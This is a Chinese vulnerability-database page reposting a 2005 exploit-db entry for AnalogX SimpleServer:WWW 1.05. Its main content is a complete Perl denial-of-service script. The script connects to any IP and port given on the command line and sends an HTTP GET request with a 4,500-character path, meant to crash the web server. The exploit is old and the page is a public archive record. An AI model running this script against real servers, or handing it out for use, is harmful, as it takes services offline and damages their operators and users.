AnalogX SimpleServer:WWW 1.05 – Denial of Service

AnalogX SimpleServer:WWW 1.05 – Denial of Service

漏洞ID 1055237 漏洞类型
发布时间 2005-07-07 更新时间 2005-07-07
图片[1]-AnalogX SimpleServer:WWW 1.05 – Denial of Service-安全小百科CVE编号 N/A
图片[2]-AnalogX SimpleServer:WWW 1.05 – Denial of Service-安全小百科CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/1094
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#!/usr/bin/perl

use IO::Socket;

if (@ARGV <2)
 {
  print "n ::: ---------------------------------------------- :::n";
  print " ::: AnalogX SimpleServer WWW 1.05 Dos Exploit     :::n";
  print " :::                                                :::n";
  print " ::: Advisory : http://www.ussrback.com/labs45.html :::n";
  print " ::: By       : Qnix  - Qnix[at]bsdmail[dot]org     :::n";
  print " :::                                                :::n";
  print " ::: Usage:  analogx_dos.pl [ip] [port]             :::n";
  print " ::: ---------------------------------------------- :::n";
  exit();
 }

$buf="A"x4500;
print "n <+> Prepare to start connect.n";
sleep(1);
$s = IO::Socket::INET->new(Proto=>"tcp",
                           PeerAddr=>$ARGV[0],
                           PeerPort=>$ARGV[1],
                           Timeout=>6
                           ) or die " <-> Target web server already DoSeD ??? or can't connect :(nn";
 $s->autoflush();

print " <+> Connected to $ARGV[0]:$ARGV[1]n";
sleep(1);
print " <+> Sending the devil shit.n";
sleep(1);
print $s "GET /$buf HTTP/1.1n";

print " <+> Prepare to DoS with AAAAAA's .n";
sleep(1);
close($s);

print " <+> Ok now target web server maybe DoSeD.nn";

# milw0rm.com [2005-07-07]

相关推荐: Whois.Cart Profile.PHP Cross-Site Scripting Vulnerability

Whois.Cart Profile.PHP Cross-Site Scripting Vulnerability 漏洞ID 1096456 漏洞类型 Input Validation Error 发布时间 2005-06-23 更新时间 2005-06-23…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享